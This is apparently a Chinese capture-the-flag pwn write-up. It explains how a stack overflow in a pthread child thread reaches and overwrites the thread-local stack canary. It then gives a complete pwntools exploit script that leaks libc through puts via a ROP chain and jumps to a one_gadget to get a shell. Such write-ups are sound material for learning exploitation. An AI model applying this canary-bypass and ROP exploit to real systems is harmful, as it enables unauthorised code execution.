老规矩用IDA打开题目
题目使用了pthread_create创建函数pthread_join用于阻塞线程等待子线程完成
漏洞点在于test_thread函数中
明显的栈溢出
观察可得canary固定
这里要注意的是如果想用常规的puts泄露得到canary(即:覆盖一位通过puts带出来,会使子线程崩溃)由于main调用了pthread_join函数等待线程被等待的线程崩溃也会导致整个程序崩溃所以不可取。每个线程的创建都拥有一个线程局部变量结构体用于存储线程的信息即TLS canary也是一样又因为题目提供的可输入字符的数量够大可以覆盖到TLS所以我们可以利用栈溢出修改canary来实现绕过。
计算可得缓冲区到canary的偏移为0x870
之后就是简单的rop了
from pwn import *
p = process("./pwn")
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF("./pwn")
def gd():
gdb.attach(p)
pause()
#gd()
ret_addr = 0x000000000040101a
pop_rsi = 0x0000000000401361
pop_rdi = 0x0000000000401363
bss_addr = 0x404060
vuln_addr = 0x00000000004011D6
puts_addr = elf.plt['puts']
payload = b'a' * 0x38 + p64(pop_rdi) + p64(elf.got['puts']) + p64(puts_addr) + p64(vuln_addr)
payload = payload.ljust(0x870,b'a')
p.sendline(payload)
p.recvuntil(b'a' * 0x38)
p.recvline()
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - libc.sym['puts']
print(hex(libc_base))
one_shot = libc_base + 0xe3afe
pop_rdx_r12 = libc_base + 0x0000000000119211
pop_rsp_r13_r15 = libc_base + 0x00000000000ef195
print(hex(one_shot))
#gd()
p.sendline(b'a' * 0x38 + p64(pop_rdx_r12) + p64(0) * 2 + p64(pop_rsi) + p64(0) * 2+ p64(one_shot))
p.interactive()
成功拿到权限